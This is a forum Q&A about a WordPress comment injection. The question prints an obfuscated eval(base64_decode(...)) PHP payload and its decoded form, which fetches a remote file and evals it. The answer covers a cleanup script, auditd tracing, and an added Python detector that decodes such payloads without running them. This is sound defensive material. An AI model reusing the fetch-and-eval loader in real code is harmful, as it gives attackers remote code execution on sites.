Eval Base64 virus Wordpress
Question
I'm using a WordPress blog. Today I got a comment like this:
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
When I decoded this comment using a decoder I got:
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
I'm getting many comments like this. Can anyone help me to resolve this problem? Is it a hack, or does it show the beginning of hacking?
Recommended answer
None of the suggestions worked for us. The following is how we removed malicious code from multiple WordPress sites without any downtime.
We ran into a problem where we had multiple legacy WordPress sites sharing one filesystem that was infiltrated by this virus.
We ended up writing a little Python script to traverse our filesystem and detect the malicious code.
Here's the code for anyone interested (NOTE: USE AT OWN RISK): https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
# finds all infected files, will not do anything but READ
python -m eval_scrubber find .
# attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
That script will scan the filesystem for malicious content, and as a separate command it will attempt to remove the base64 eval functions.
This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor what file is writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
Once we found the generator of the virus, we did one more eval_scrubber remove and then our problem was fixed.
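The answer notes that the regex stopped matching once PHP comments were placed inside the injected call. The following is an added example, not eval_scrubber's code and not part of the original answer: a detector that drops PHP comments before matching and decodes each payload for review. All function names and sample strings are hypothetical and constructed here.

```python
import base64
import binascii
import re

# A string literal (kept as-is) or a PHP comment (dropped). Trying strings
# first stops "//" or "#" inside a quoted payload being read as a comment.
# Assumption: simple lexer, it ignores heredocs and text outside <?php tags.
_TOKEN = re.compile(
    r"""("(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')"""
    r"""|(/\*.*?\*/|//[^\n]*|#[^\n]*)""",
    re.S,
)
# PHP function names are case-insensitive, hence re.I.
_EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=\s]+)\1""",
    re.I,
)

def strip_php_comments(src):
    """Replace each comment with a space; leave string literals untouched."""
    return _TOKEN.sub(lambda m: m.group(1) or " ", src)

def find_eval_payloads(src):
    """Return the decoded payloads of eval(base64_decode("...")) calls."""
    found = []
    for m in _EVAL_B64.finditer(strip_php_comments(src)):
        try:
            raw = base64.b64decode("".join(m.group(2).split()), validate=True)
        except (binascii.Error, ValueError):
            continue  # quoted text is not valid base64, skip it
        found.append(raw.decode("utf-8", "replace"))
    return found

# Constructed samples with a harmless payload (not taken from the page).
_B64 = base64.b64encode(b'echo "constructed sample";').decode()
PLAIN = '<?php eval(base64_decode("%s")); ?>' % _B64
SPLIT = '<?php eval/*x*/(/*y*/base64_decode( // z\n"%s")); ?>' % _B64
CLEAN = '<?php // eval(base64_decode("%s")) in a comment\necho 1; ?>' % _B64

if __name__ == "__main__":
    for name, sample in (("plain", PLAIN), ("split", SPLIT), ("clean", CLEAN)):
        print(name, find_eval_payloads(sample))
```

The decoded payloads are returned as text only and are never executed, so the output can be reviewed before deciding what to remove.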